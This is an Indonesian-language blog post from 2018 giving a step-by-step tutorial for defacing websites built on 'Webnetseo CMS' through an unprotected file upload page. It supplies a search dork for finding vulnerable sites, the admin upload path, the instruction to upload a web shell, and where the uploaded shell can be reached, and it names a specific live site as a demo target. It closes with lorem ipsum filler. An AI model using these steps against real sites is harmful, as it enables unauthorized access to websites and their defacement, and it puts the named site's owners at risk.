Tutorial deface webnetseo file upload vulnerability

  • On January 22, 2018
Oke guys ketemu lagi sma abang ganteng
Kali ini cakil akan share tutorial deface
Webnetseo cms file upload vulnerability

Oke cekidot guys
Pro of concept
1.Dork ?
inurl:picc.php?id=
(Kembangin syang)
2.Exploit : localhost/path/admin/up.php
or
localhost/admin/up.php

3.upload shell lu cees :)
4.akses shell ?
localhost/images/upload_file/shell.php
or
Liat di url nya di bagian belakang.
localhost/images/upload_file/nomeracak_filename.php


And buum :v
Oke sekian dan terima kasih
Nitip nick boleh kan
./Mr.cakil
Demo ?
http://www.jsclyf.com/admin/up.php
Mr.Cakil

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi eu sem ultrices, porttitor mi eu, euismod ante. Maecenas vitae velit dignissim velit rutrum gravida sit amet eget risus. Donec sit amet mollis nisi, nec commodo est.

4 comments: